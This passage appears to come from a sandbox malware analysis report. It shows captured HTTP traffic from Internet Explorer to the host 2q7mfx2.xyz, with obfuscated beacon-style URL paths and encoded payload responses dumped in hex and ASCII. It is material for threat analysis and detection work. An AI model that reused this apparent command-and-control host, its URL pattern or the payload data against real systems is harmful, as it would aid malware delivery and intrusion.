                                              Data Ascii: JGm6K2qmqKqCHlwmH4re6tyYgGQ5l3ALk4rurf24mWHABRRmeAVSDvTG5v3Drhw6xaSdYU9XiyZMSOyPld1K/ItqOLpVZxTpYpE5A0O4903S3X3EPIC0sf1addzCBoNeFMXKEpBjTVBtdROT2peaVHqz6OwtPSZUqKBeCElyY+PPv2vEHCMMPzWiUc/5FXWX9faIskqdYO++YIJhy5/4TwHTc04biaynECsTN+3cVGazqk8/27U
                                              Apr 12, 2021 15:25:03.051923990 CEST5601INData Raw: 78 44 51 6d 4d 4f 68 51 33 79 6c 52 6d 6b 2f 51 59 65 55 64 63 69 33 37 2b 51 41 2f 46 57 7a 38 51 41 65 5a 39 2f 36 30 51 62 56 68 45 59 59 6e 65 4b 64 57 35 78 74 54 52 38 2b 53 46 67 67 4a 35 46 6c 72 36 56 4c 79 78 6c 67 48 5a 50 77 67 30 68
                                              Data Ascii: xDQmMOhQ3ylRmk/QYeUdci37+QA/FWz8QAeZ9/60QbVhEYYneKdW5xtTR8+SFggJ5Flr6VLyxlgHZPwg0hR2NILQCVeGgrG7cb4kd7/FTO1HEfLZeE3DasEfLCA6Ufj2qek9htBo4qYwWRvfiirVFbcRhpsRFLfz0C1IZKEaJcd/eTea1HylRhDK8hSEmzZkXHjXWQVDbRwD1MBwPGUy19NQC6r4FaJmfvkPOW/pr5+LWxQ89qa
                                              Apr 12, 2021 15:25:03.051939964 CEST5602INData Raw: 43 64 7a 52 67 6d 32 42 30 4c 64 6f 79 70 64 39 77 45 69 39 53 67 56 34 2b 6d 31 6e 75 4e 6e 75 77 2b 4b 63 37 2f 53 51 4d 49 63 31 75 73 66 6a 42 47 43 4e 39 5a 68 2f 78 79 69 52 55 50 31 56 67 30 71 71 57 71 4f 76 2b 53 46 66 33 66 45 4e 73 6d
                                              Data Ascii: CdzRgm2B0Ldoypd9wEi9SgV4+m1nuNnuw+Kc7/SQMIc1usfjBGCN9Zh/xyiRUP1Vg0qqWqOv+SFf3fENsm19kd70EhXLbktEq9h05bIjboiFJwGKQ5iJA2iy9TMcKy/iy6ukmNNFXJXeWK8rs3DwLTieEBrxAJvgVtxbqBpUX3QOPRW6SAH3f5qhYJu4nZhX4JtgDkfBkJF0bst9fFCE/cht+WJBrD179QA0h2YwCiQ9g2owfAN
                                              Apr 12, 2021 15:25:03.176145077 CEST5604INData Raw: 66 5a 30 72 6e 43 7a 79 49 2b 4d 7a 4a 54 51 31 48 57 46 44 31 65 4a 6c 79 45 67 77 56 4b 38 51 35 6a 4c 5a 59 74 30 43 44 51 55 50 52 72 48 72 47 6f 2b 38 68 76 2f 2f 75 63 56 54 30 71 6a 72 76 70 35 38 6c 62 77 66 32 69 36 48 49 6f 31 67 62 62
                                              Data Ascii: fZ0rnCzyI+MzJTQ1HWFD1eJlyEgwVK8Q5jLZYt0CDQUPRrHrGo+8hv//ucVT0qjrvp58lbwf2i6HIo1gbbYHYklxrGOYZ6Un3spJm/YrMGtgT9iX6ncsWKoKCRKemgKGQgUV9EwxF3JeWU1nI24Tu5zvHEtpnYPnfTlhknoKn7M4zdXZq98CksIg9qr5c+MCU8ih+WT8e4onOGXZLdOo3/kxEDTiPdrcmMBqOm39EFI+kmxEPFN
                                              Apr 12, 2021 15:25:03.642203093 CEST5833OUTGET /favicon.ico HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: 2q7mfx2.xyz
                                              Connection: Keep-Alive
                                              Cookie: PHPSESSID=626b5h9nvpj75et1g5p6lfetg6; lang=en
                                              Apr 12, 2021 15:25:03.767584085 CEST5834INHTTP/1.1 200 OK
                                              Date: Mon, 12 Apr 2021 13:25:03 GMT
                                              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                              Last-Modified: Tue, 23 Mar 2021 14:18:02 GMT
                                              ETag: "1536-5be34d9a16ff1"
                                              Accept-Ranges: bytes
                                              Content-Length: 5430
                                              Keep-Alive: timeout=5, max=99
                                              Connection: Keep-Alive
                                              Content-Type: image/vnd.microsoft.icon
                                              Data Raw: 00 00 01 00 02 00 10 10 00 00 00 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 00 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 87 73 f7 9c 87 73 f9 9c 87 73 f7 9c 87 73 77 9c 87 72 03 ff ff ff 01 9c 87 73 09 9c 87 73 0f 9c 87 73 0d 9b 87 73 05 ff ff ff 01 9c 87 73 15 9c 87 73 c7 9c 87 73 f9 9c 87 73 f9 9c 87 73 85 9c 87 73 f9 9c 87 72 f9 9c 87 73 7b 9c 87 73 05 9c 87 73 23 9c 87 73 7f 9c 87 73 c3 9b 87 72 d3 9c 87 73 cf 9c 87 73 ad 9c 87 73 5b 9c 87 73 0d 9c 87 73 1b 9c 87 73 c5 9b 87 73 ff 9c 87 73 85 9c 87 73 f7 9c 87 73 7d 9c 87 73 07 9c 87 73 57 9c 87 72 db 9c 87 73 ab 9c 87 73 6d 9c 87 73 4b 9c 87 73 43 9c 87 73 77 9c 87 73 cf 9c 87 73 b7 9b 86 73 25 9c 87 73 21 9c 87 73 cb 9c 87 73 87 9c 87 73 7f 9c 87 73 05 9c 87 73 55 9c 87 73 e1 9c 87 73 59 9c 87 73 81 9c 87 73 df 9c 87 73 c9 9b 86 72 23 ff ff ff 01 9c 87 73 13 9c 87 73 97 9c 87 73 cd 9c 87 73 19 9c 87 72 25 9c 87 73 5b 9c 87 73 03 9c 87 73 1d 9c 87 73 d9 9c 87 73 5d 9c 87 73 0b 9b 87 72 ef 9c 87 73 53 9b 87 73 bf 9c 87 73 71 ff ff ff 01 ff ff ff 01 9c 87 73 0b 9c 87 73 a5 9c 87 73 95 9c 87 73 03 9c 87 73 03 ff ff ff 01 9c 87 73 75 9c 87 73 b5 9c 87 73 07 ff ff ff 01 9c 87 73 c1 9c 87 73 db 9c 87 73 e7 9c 87 73 41 ff ff ff 01 ff ff ff 01 ff ff ff 01 9c 86 73 25 9b 87 73 d9 9c 87 73 23 ff ff ff 01 9c 87 72 07 9c 87 72 bb 9c 87 73 5d ff ff ff 01 ff ff ff 01 9c 87 73 1b 9c 87 73 db 9c 87 73 6b 9c 87 73 03 9c 87 73 03 ff ff ff 01 ff ff ff 01 9c 87 73 03 9c 87 73 af 9c 87 73 5d ff ff ff 01 9c 87 73 0d 9c 87 72 cd 9c 87 73 37 ff ff ff 01 ff ff ff 01 9c 86 73 09 9c 87 73 c9 9c 87 72 91 9c 86 72 a3 9c 87 73 81 9c 86 72 05 ff ff ff 01 ff ff ff 01 9b 87 73 85 9c 87 73 7f ff ff ff 01 9c 87 73 0d 9c 87 73 cb 9b 87 73 37 ff ff ff 01 ff ff ff 01 9c 87 73 09 9c 87 73 cd 9c 87 73 69 9c 87 73 3f 9c 87 73 37 9c 87 73 13 ff ff ff 01 ff ff ff 01 9b 87 73 83 9c 87 73 7f ff ff ff 01 9c 87 73 07 9c 87 73 b9 9c 87 72 57 ff ff ff 01 ff ff ff 01 9c 87 73 09 9c 87 73 c9 9c 87 73 97 9c 87 73 a9 9c 87 73 a9 9c 87 73 97 ff ff ff 01 ff ff ff 01 9c 87 73 ab 9c 87 73 5b ff ff ff 01 ff ff ff 01 9c 87 73 73 9c 87 73 ad 9c 87 73 05 ff ff ff 01 9c 87 73 09 9c 87 73 cd 9c 87 73 6d 9c 87 73 49 9c 87 73 3b 9c 87 73 07 ff ff ff 01 9c 87 73 21 9c 87 73 d3 9c 87 73 23 ff ff ff 01 9c 87 73 05 9c 87 73 1b 9b 87 73 d3 9c 87 73 51 ff ff ff 01 9b 86 73 09 9c 87 73 cb 9c 87 73 89 9b 87 72 83 9c 87 73 6d 9c 87 73 05 9c 87 72 07 9c 87 73 97 9b 87 72 91 9c 87 73 03 9c 87 73 05 9b 87 72 89 9c 87 73 07 9c 87 73 51 9c 87 73 d9 9c 87 72 4b 9c 87 73 07 9c 87 73 67 9c 86 73 27 ff ff ff 01 ff ff ff 01 9b 86 73 0d 9c 87 73 81 9c 87 73 c5 9c 87 73 17 9c 87 73 27 9c 87 73 5f 9c 87 73 f7 9c 87 73 85 9c 87 73 09 9b 87 72 51 9c 87 73 d3 9c 87 73 9d 9c 87 73 4b 9c 86 72 2f 9c 87 73 33 9c 87 73 61 9c 87 73 bd 9b 87 73 b1 9c 87 73 21 9c 87 73 23 9c 87 73 cd 9c 87 73 87 9c 87 73 f9 9c 86 73 f9 9c 87 73 83 9c 87 73 07 9c 87 73 1f 9c 87 73 79 9c 87 73 b9 9c 87 72 c5 9c 87 73 c3 9c 87 72 a7 9c 87 73 55 9c 87 72 0b 9c 87 73 1d 9c
                                              Data Ascii: h& ( @sssswrssssssssssrs{ss#ssrsss[sssssss}ssWrssmsKsCswsss%s!sssssUssYsssr#ssssr%s[ssss]srsSssqssssssussssssAs%ss#rrs]sssksssss]srs7ssrrsrsssss7sssis?s7sssssrWssssssss[sssssssmsIs;ss!ss#ssssQsssrsmsrsrssrssQsrKssgs'sssss's_sssrQsssKr/s3sasss!s#ssssssssysrsrsUrs


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.349741142.93.7.18780C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                              TimestampkBytes transferredDirectionData
                                              Apr 12, 2021 15:25:05.763164043 CEST5840OUTGET /ddsadasdsaasdasdasd/pVvzK0_2/FwDvnZbRILJs4gC4ZNCtKHr/k327Dz9kpG/ZIs5yRxNJXU0MDx7K/1oYc2LXr26Jn/g5cPh2VKvvb/yvDaP_2F5_2F_2/BJc306ZiYZoF1QKdSMJJW/mGSWnCTz_2FMEjKy/DiOWbVEp8jQjHYx/7HEU8s2PxBoZ2q0K8s/zFYWNQgho/NDIqciBsagELw6U9Ykcj/Yn73Zb3X.pal HTTP/1.1
                                              Accept: text/html, application/xhtml+xml, image/jxr, */*
                                              Accept-Language: en-US
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Accept-Encoding: gzip, deflate
                                              Host: 2q7mfx2.xyz
                                              Connection: Keep-Alive
                                              Cookie: lang=en
                                              Apr 12, 2021 15:25:05.913686991 CEST5842INHTTP/1.1 200 OK
                                              Date: Mon, 12 Apr 2021 13:25:05 GMT
                                              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                              X-Powered-By: PHP/5.4.16
                                              Set-Cookie: PHPSESSID=fo87m6ng0tv1guso9t8mco40j7; path=/; domain=.2q7mfx2.xyz
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                              Pragma: no-cache
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 34 38 33 30 30 0d 0a 4e 67 69 5a 2b 45 75 7a 76 56 38 44 6b 36 4b 67 4c 38 4e 4c 30 41 42 31 43 4c 57 74 6f 38 65 59 63 36 43 63 33 36 4d 6a 4d 46 53 49 44 57 56 4a 53 69 63 55 62 36 4b 5a 2f 66 39 31 49 4a 2f 43 56 70 2f 73 57 35 4a 53 64 72 6e 5a 52 49 79 46 6a 36 35 49 35 74 35 6b 31 51 44 6e 66 65 76 6f 79 53 54 53 45 4d 58 79 32 76 6c 66 38 4f 5a 2f 2b 34 45 35 57 43 79 2b 46 65 57 47 30 63 49 59 49 79 63 41 4a 65 47 2f 63 52 75 31 4e 74 71 6c 68 59 37 2f 44 2f 49 73 47 46 39 33 4f 79 67 43 68 56 35 57 30 6e 50 59 6d 38 49 5a 67 78 61 67 49 37 77 69 79 31 75 44 57 7a 45 4e 6c 7a 7a 42 54 6f 67 52 66 45 70 32 2b 79 32 50 33 4d 4d 73 68 36 31 2b 54 42 35 6d 6c 4b 6a 68 6c 49 74 65 54 32 49 55 34 36 75 7a 31 54 52 79 63 57 51 30 41 5a 33 65 61 30 6b 57 79 36 68 45 59 2b 47 49 46 2f 53 56 75 6f 59 42 4e 30 6f 49 55 33 39 36 44 67 69 73 56 54 58 77 32 71 71 4c 75 4b 7a 6b 4a 47 59 37 2f 65 46 42 48 72 53 35 73 34 5a 67 2b 58 49 4e 34 74 53 66 39 4d 31 71 37 4a 5a 53 73 30 67 6d 52 53 31 42 33 7a 2b 4f 44 45 57 49 6c 68 67 62 58 4a 43 6d 34 76 2f 70 39 2f 66 54 36 44 4d 46 61 4b 73 46 53 57 33 56 6c 4d 50 57 6d 4f 59 55 32 4f 7a 41 31 6e 65 4a 6e 52 6c 72 6d 79 44 72 59 63 6c 4a 75 73 43 36 47 70 56 43 6f 51 52 33 56 51 52 62 6c 71 77 36 68 53 30 58 52 4a 73 62 6e 31 70 68 71 4b 51 38 74 4e 51 4c 65 6d 50 4b 4d 30 52 48 2b 70 36 4a 4c 41 50 61 73 49 55 64 59 72 58 39 71 74 42 47 74 4b 4e 51 30 55 55 79 70 73 2b 79 59 6b 52 67 45 45 2b 4a 48 33 45 51 51 6c 79 41 75 58 65 52 37 54 62 6d 6a 31 44 66 7a 48 69 4c 78 59 52 7a 4c 39 70 38 6e 70 50 57 34 36 6c 45 43 73 75 37 46 6d 4f 2b 50 57 6b 56 45 38 4e 67 33 62 57 54 39 64 33 6b 59 6e 6e 2b 50 44 6e 36 31 41 75 32 49 6a 6f 6f 31 41 2f 7a 65 31 4a 45 2f 56 41 37 4b 34 78 41 57 5a 51 44 44 64 6c 30 5a 49 38 46 4c 2b 56 45 58 46 35 38 50 51 76 39 55 36 59 38 55 31 4c 44 45 75 59 54 31 6e 70 78 43 46 58 43 4c 58 55 7a 66 34 50 32 68 64 31 63 6a 54 49 67 6e 34 47 36 37 6d 6c 6f 63 45 7a 67 6c 68 35 61 6b 78 56 73 36 48 5a 38 61 4f 76 51 48 4e 2b 44 67 58 73 50 63 42 41 65 34 35 6e 53 70 6e 6a 4c 37 6c 79 31 69 65 75 69 37 6b 71 48 53 43 52 37 34 4d 77 4c 39 4d 6b 6d 65 68 2b 7a 6c 47 4c 66 37 2f 51 4c 39 50 69 30 39 64 6c 73 65 4c 48 31 31 42 30 56 6f 35 61 45 33 6e 44 7a 66 76 32 39 79 75 48 32 6a 34 69 37 4a 75 71 54 63 71 32 36 48 71 45 34 2f 50 55 52 70 70 59 69 79 6e 51 71 57 39 4f 59 79 67 2f 75 72 77 78 41 52 38 71 61 32 37 78 55 52 38 76 4e 2b 51 74 47 7a 48 7a 36 44 41 73 63 36 74 6a 69 44 64 4f 62 68 37 4e 34 47 41 4c 31 62 4a 51 46 4b 33 75 59 54 35 66 44 73 76 76 4d 62 64 59 76 65 79 61 65 58 35 47 74 65 6c 6c 4b 4d 59 68
                                              Data Ascii: 48300NgiZ+EuzvV8Dk6KgL8NL0AB1CLWto8eYc6Cc36MjMFSIDWVJSicUb6KZ/f91IJ/CVp/sW5JSdrnZRIyFj65I5t5k1QDnfevoySTSEMXy2vlf8OZ/+4E5WCy+FeWG0cIYIycAJeG/cRu1NtqlhY7/D/IsGF93OygChV5W0nPYm8IZgxagI7wiy1uDWzENlzzBTogRfEp2+y2P3MMsh61+TB5mlKjhlIteT2IU46uz1TRycWQ0AZ3ea0kWy6hEY+GIF/SVuoYBN0oIU396DgisVTXw2qqLuKzkJGY7/eFBHrS5s4Zg+XIN4tSf9M1q7JZSs0gmRS1B3z+ODEWIlhgbXJCm4v/p9/fT6DMFaKsFSW3VlMPWmOYU2OzA1neJnRlrmyDrYclJusC6GpVCoQR3VQRblqw6hS0XRJsbn1phqKQ8tNQLemPKM0RH+p6JLAPasIUdYrX9qtBGtKNQ0UUyps+yYkRgEE+JH3EQQlyAuXeR7Tbmj1DfzHiLxYRzL9p8npPW46lECsu7FmO+PWkVE8Ng3bWT9d3kYnn+PDn61Au2Ijoo1A/ze1JE/VA7K4xAWZQDDdl0ZI8FL+VEXF58PQv9U6Y8U1LDEuYT1npxCFXCLXUzf4P2hd1cjTIgn4G67mlocEzglh5akxVs6HZ8aOvQHN+DgXsPcBAe45nSpnjL7ly1ieui7kqHSCR74MwL9Mkmeh+zlGLf7/QL9Pi09dlseLH11B0Vo5aE3nDzfv29yuH2j4i7JuqTcq26HqE4/PURppYiynQqW9OYyg/urwxAR8qa27xUR8vN+QtGzHz6DAsc6tjiDdObh7N4GAL1bJQFK3uYT5fDsvvMbdYveyaeX5GtellKMYh
                                              Apr 12, 2021 15:25:05.913719893 CEST5843INData Raw: 72 56 6f 39 4c 70 70 47 5a 30 57 2b 68 39 39 2f 73 66 56 5a 5a 30 53 79 61 71 4c 6f 46 76 42 49 71 6d 76 6e 31 36 6b 65 63 74 64 31 38 38 52 35 70 69 49 39 62 6b 65 2f 55 4c 70 4d 53 4e 39 67 42 74 66 70 6b 77 63 34 47 6c 5a 76 64 6f 54 39 58 4e
                                              Data Ascii: rVo9LppGZ0W+h99/sfVZZ0SyaqLoFvBIqmvn16kectd188R5piI9bke/ULpMSN9gBtfpkwc4GlZvdoT9XNZKS6xDLWDbKXHa5/+1BSh67G7RSxOCLM/FHTB/u9FEh1f2CEPnaAVXGHrTLWDN8Jn7S+SsqHBk+1qP5Op60yufHmL3fwoyyigiX8J8k2bA3gZSEgHdygRDyS/1opj3OvOdAFoVN7SUrVrirthIytbDbQr+jGq+maF
                                              Apr 12, 2021 15:25:05.913741112 CEST5844INData Raw: 75 35 64 70 55 57 79 75 59 74 49 50 6f 79 34 4d 51 76 56 61 74 44 70 78 61 46 39 4b 57 41 41 55 47 48 6f 55 53 71 6f 47 4e 37 65 63 70 62 57 71 71 75 73 43 33 47 35 62 49 33 6c 76 58 73 53 4f 6f 50 4b 54 7a 42 61 6d 54 72 64 6d 6d 37 2b 36 51 52
                                              Data Ascii: u5dpUWyuYtIPoy4MQvVatDpxaF9KWAAUGHoUSqoGN7ecpbWqqusC3G5bI3lvXsSOoPKTzBamTrdmm7+6QR209h5RCBQIeWnMUmuf92MD6y+kakJGKaA/3fYDfu7+ViMEvJeBPqxzYYzfhvX6GLmjLYD4Pdk5aqUPVOe+3WQJK4TVMJ9SDqSdIUqSEvZJgQ+6yDvwFkXACcXkf10tC4Rp4ZbBILdQa/4dDUHjuxZWQoNuQCogl7E
                                              Apr 12, 2021 15:25:05.913758039 CEST5846INData Raw: 79 6a 52 4f 38 31 71 32 65 65 30 38 2f 48 55 59 36 48 34 6c 30 66 75 36 30 33 66 73 35 44 4e 78 6c 58 74 59 39 47 30 32 30 37 67 4b 53 31 65 6d 30 64 67 33 67 75 77 62 58 68 58 62 6f 6c 7a 44 48 56 46 77 4c 54 7a 79 45 67 72 62 68 34 4d 36 32 6c
                                              Data Ascii: yjRO81q2ee08/HUY6H4l0fu603fs5DNxlXtY9G0207gKS1em0dg3guwbXhXbolzDHVFwLTzyEgrbh4M62l8nqvwSofVONr8d/PwHq4mPZz0IC7N44maUH00Na1glJMdahzfs/aQGZeDHNlFHbPhWCEUxEbchHzXUIX+E7qlgbSc11od7JtChBU20twRbzZEQCzp/UMPUkN38EorjhlBMHiYkCSnzgNOQPPvm+83WmK5mqo26GyG
                                              Apr 12, 2021 15:25:05.913774967 CEST5847INData Raw: 5a 67 5a 6b 47 74 7a 4e 4c 77 6f 49 6c 4f 5a 68 63 45 4b 62 2b 50 39 37 71 63 39 66 34 33 53 79 72 57 31 52 6f 42 48 56 71 57 42 2f 61 30 47 74 33 65 68 70 65 64 38 78 56 4e 32 44 76 59 76 4a 56 52 44 69 43 42 58 67 52 57 6e 65 4d 78 2f 2f 57 6f
                                              Data Ascii: ZgZkGtzNLwoIlOZhcEKb+P97qc9f43SyrW1RoBHVqWB/a0Gt3ehped8xVN2DvYvJVRDiCBXgRWneMx//Wo1MAceUj7TWmgpY80w5wWtOWxoIflg3D+fCweMsYeNHMCQzD0hZOl+WvKpDXf08fiawjbEe4mlGGMUnNq+/Qsh0eLibviKc5hm5k2KomPOXsJJnLBFP7Ar0X4C/2UjwnX7BtFcBFddNoZ+3444TVucxTjY/YR7FvNw
                                              Apr 12, 2021 15:25:05.913790941 CEST5848INData Raw: 57 30 66 6f 79 78 46 65 78 7a 31 56 31 54 6a 59 4b 4b 4d 71 45 57 34 6b 32 44 51 38 43 33 33 52 76 70 76 48 56 31 75 35 77 46 6c 67 72 4a 6d 33 6c 79 5a 6c 70 59 6a 71 36 78 65 73 56 49 79 44 77 5a 73 35 41 42 33 75 36 42 54 4e 59 45 32 6a 76 33
                                              Data Ascii: W0foyxFexz1V1TjYKKMqEW4k2DQ8C33RvpvHV1u5wFlgrJm3lyZlpYjq6xesVIyDwZs5AB3u6BTNYE2jv3QyXI6AjP3OxPSoY96z7TARMJNvyQaWRhQcJ5bYRlvKACFceVbSa4fXb6AJm8ElVoeQPjZYRBPPg42KebX1HiG+csezJfWEk0KCLSS74Y2znR1jusSl6fdlTE9H1e6S8MqIwuhwQNg7t2gK5Ex95+ZTXQFGb2cIfnu
                                              Apr 12, 2021 15:25:05.913808107 CEST5850INData Raw: 75 31 7a 54 66 76 77 77 53 69 32 41 4d 32 31 67 52 62 47 30 46 79 49 6d 77 67 4b 52 55 44 6b 67 64 53 2f 72 42 58 6b 74 30 4d 50 65 42 35 45 72 4a 4c 64 73 50 55 69 39 62 6e 4c 55 61 57 78 48 58 6f 4c 66 4f 47 6f 37 5a 30 72 6c 69 34 42 57 67 71
                                              Data Ascii: u1zTfvwwSi2AM21gRbG0FyImwgKRUDkgdS/rBXkt0MPeB5ErJLdsPUi9bnLUaWxHXoLfOGo7Z0rli4BWgq4NZkAI9XZCTyifTiVygfjY1H3uqh0w8dyqa8OoFduZfpA0CdIcNFJ6TmHVl9NB2sGzor04ROQpwbtERxD3g7pqQcta4favnGpf4Y6ZnwfUpY7sxJ60GJlft7l/huQUQedN72fzvCS9YRoaxi4RTdBIERX4g1dGysm
                                              Apr 12, 2021 15:25:05.913824081 CEST5851INData Raw: 63 66 4c 59 59 4e 68 45 7a 4a 4d 50 57 61 70 39 34 54 36 74 4e 67 58 32 36 79 54 62 31 53 4d 68 5a 6b 43 77 6c 4a 51 72 48 70 43 77 2f 6c 4b 51 41 4a 4e 48 58 53 79 2b 79 44 44 54 58 36 39 67 51 6d 57 68 6f 4e 74 5a 6f 47 64 37 55 41 56 35 70 6f
                                              Data Ascii: cfLYYNhEzJMPWap94T6tNgX26yTb1SMhZkCwlJQrHpCw/lKQAJNHXSy+yDDTX69gQmWhoNtZoGd7UAV5podltuqzLxnP4/pb/w1xJSCJv04gG3LGkeiylyg48rVfiRjrIELwvhrUE4vPgMjPPIP3dsMXmObG8y3MI3E8PITBzofJT1fW38AwUINV0yAg9pKy3dwiDtpE3e/l1N1NEofp6Nr2XoHDGnVACyTfVFFrErQYlXYR/z8
                                              Apr 12, 2021 15:25:05.913841009 CEST5852INData Raw: 50 2b 36 50 57 4f 4f 37 79 4a 49 39 4d 63 36 4e 54 6f 6d 77 78 58 38 4e 37 38 53 31 51 63 53 6f 39 6c 70 66 63 34 31 36 41 64 46 50 36 58 55 36 63 53 43 36 49 48 6a 63 67 33 41 55 45 44 63 49 4b 70 56 34 77 31 49 4f 57 63 57 64 72 38 47 45 4b 6f
                                              Data Ascii: P+6PWOO7yJI9Mc6NTomwxX8N78S1QcSo9lpfc416AdFP6XU6cSC6IHjcg3AUEDcIKpV4w1IOWcWdr8GEKof8FEUYbVgtg1e4tina6mmf4P+Tojtq+kUjn20kxa00toWjOqXf4U3B3UiUfQme2z8eYw5GlLRQlhjxspHYojAY9IM+u5B3zIX7e0799Xni5P7yHPUeCjTKTpBN37yB/LCp80j31DDOAZbqY/XvqJr7U656i+dmgFJ
                                              Apr 12, 2021 15:25:05.913856983 CEST5854INData Raw: 77 2b 48 53 4f 55 46 6f 35 74 46 64 53 52 32 6e 46 77 58 4f 65 51 55 67 63 6f 65 2f 6c 73 39 61 66 48 68 66 49 50 39 37 31 55 78 2f 5a 4f 4f 4f 2b 54 61 50 52 4a 4a 6a 32 64 6f 30 73 6c 63 4b 4d 74 62 54 36 6b 46 75 6b 4d 43 63 39 73 36 76 2b 47
                                              Data Ascii: w+HSOUFo5tFdSR2nFwXOeQUgcoe/ls9afHhfIP971Ux/ZOOO+TaPRJJj2do0slcKMtbT6kFukMCc9s6v+G4oyEqZOOAzUPwnQjd/8N+PzMc2T0+KF71LUwxYNzmFAwjGaCbuq67CWLqF8bKN5OJMCLS1HiCM0idWEnCQeKUKArMJV6dbUGGwhYzLX4ZNTFUJ4sv2bZubjCA8wGYK3s2P0BJO6KV4/vhVMa08F+SjuT7yGHSGDnB
                                              Apr 12, 2021 15:25:06.038388014 CEST5855INData Raw: 67 34 76 64 6a 72 61 49 77 4c 68 6e 4d 47 6b 39 66 34 74 38 5a 75 43 42 78 67 47 53 52 4d 31 62 6d 6b 71 37 57 46 62 43 30 6a 4a 64 58 6a 76 64 58 61 78 2f 4f 39 4f 4d 30 65 6e 43 70 4f 4c 65 31 31 61 50 39 58 63 2f 6e 6d 52 4c 35 76 33 63 50 4c
                                              Data Ascii: g4vdjraIwLhnMGk9f4t8ZuCBxgGSRM1bmkq7WFbC0jJdXjvdXax/O9OM0enCpOLe11aP9Xc/nmRL5v3cPLo+e/9KEbITjCMTcD2o0kg85s/KX4G42bvcOPDHmEr7a9sr511Mb3VYibV2zaIwWQHxSjuXc1vrzlNg2G6TdQPTfQYX1E5nwX47VX1CoJmYygzjYNx8n6TF8zuOUkbx3K6kxjaJkTXIOUV3h+i+MEW8lfjQ6HqYIsT


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.349743142.93.7.18780C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                              TimestampkBytes transferredDirectionData
                                              Apr 12, 2021 15:25:08.746000051 CEST6152OUTGET /ddsadasdsaasdasdasd/akOFAAemOaw/GRWDQgHTmj_2BB/0SsNgHXf0_2F8YRF3MF_2/BTXUUhGsccvUTI0X/YtzO0a_2B5tA_2F/PAuzboBrzi2NYt1j_2/BTeCTzZqB/aUt8BZ0LT0UMxiZA_2FM/6a4EDRiKQ_2BhQNQcOC/Rn9l8Tt0802pyLpFPogw_2/F4g0qrzhYPym6/9lYbjfC9/i8invrB3NNgg4mE9K5Lu1uv/_2F.pal HTTP/1.1
                                              Accept: text/html, application/xhtml+xml, image/jxr, */*
                                              Accept-Language: en-US
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Accept-Encoding: gzip, deflate
                                              Host: 2q7mfx2.xyz
                                              Connection: Keep-Alive
                                              Cookie: lang=en
                                              Apr 12, 2021 15:25:08.888124943 CEST6153INHTTP/1.1 200 OK
                                              Date: Mon, 12 Apr 2021 13:25:08 GMT
                                              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                              X-Powered-By: PHP/5.4.16
                                              Set-Cookie: PHPSESSID=iqs393gkvcpamrgdv7bcg11bl2; path=/; domain=.2q7mfx2.xyz
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                              Pragma: no-cache
                                              Content-Length: 2480
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 6c 62 36 75 75 4b 31 79 39 6a 30 55 53 30 75 30 73 6c 51 56 74 78 52 30 58 66 49 78 59 56 49 56 49 74 2f 6f 42 54 66 6e 51 71 66 49 58 37 62 61 32 75 49 36 38 4d 4e 79 2b 30 33 4e 75 61 46 55 7a 61 75 6f 6b 55 6a 57 69 4d 53 6a 74 59 73 5a 58 62 2b 41 4d 4c 70 31 47 58 5a 74 2f 64 64 45 30 56 48 5a 38 4b 35 4a 46 42 38 43 68 49 50 64 75 64 77 77 5a 5a 4b 46 6d 51 46 45 56 6f 31 2b 58 46 4f 4d 54 4f 63 2f 55 49 47 5a 69 62 57 30 54 49 39 70 57 62 58 76 30 54 5a 66 46 76 4c 68 6a 45 4a 62 71 43 43 54 41 79 4b 66 74 51 69 6e 50 54 46 34 63 2f 55 79 41 71 70 4e 41 51 63 51 55 53 52 6c 74 58 66 73 2b 6f 71 53 46 39 38 4f 78 4e 74 5a 53 32 4b 49 67 7a 4e 69 5a 74 6c 55 62 4a 4c 56 49 5a 6b 34 77 73 5a 62 4f 68 53 4b 61 4e 48 51 63 32 64 49 50 37 66 4c 36 6f 76 30 4a 4c 49 30 4d 50 6b 36 79 48 54 31 36 38 64 6b 46 7a 75 34 45 67 32 75 36 48 74 37 4a 68 38 69 39 6e 37 61 50 5a 73 6a 2b 4b 49 6c 35 63 6e 45 41 48 4f 53 34 57 39 74 71 62 6d 66 37 2b 32 31 2f 44 32 64 7a 65 50 69 32 77 51 4c 6c 59 76 6e 6e 67 42 72 31 6e 55 65 6a 53 4e 6b 75 45 45 78 5a 53 46 76 46 35 51 56 63 62 43 37 30 37 52 35 50 54 31 48 6a 76 2f 6c 57 56 53 31 41 38 36 35 65 54 4f 4e 67 6d 2b 64 68 30 4a 6c 43 69 2f 71 5a 33 69 43 79 32 47 39 32 4c 69 77 74 36 50 47 49 64 4b 6d 35 48 38 4e 49 4b 70 67 6c 55 46 34 6c 50 73 79 6b 36 46 57 33 4d 6b 76 4a 35 73 53 41 69 66 52 6d 68 67 4b 61 43 76 6c 52 4c 75 68 45 41 75 49 39 4e 6f 79 48 64 4d 66 68 4f 32 31 38 6d 72 4b 57 67 42 34 79 34 2b 45 7a 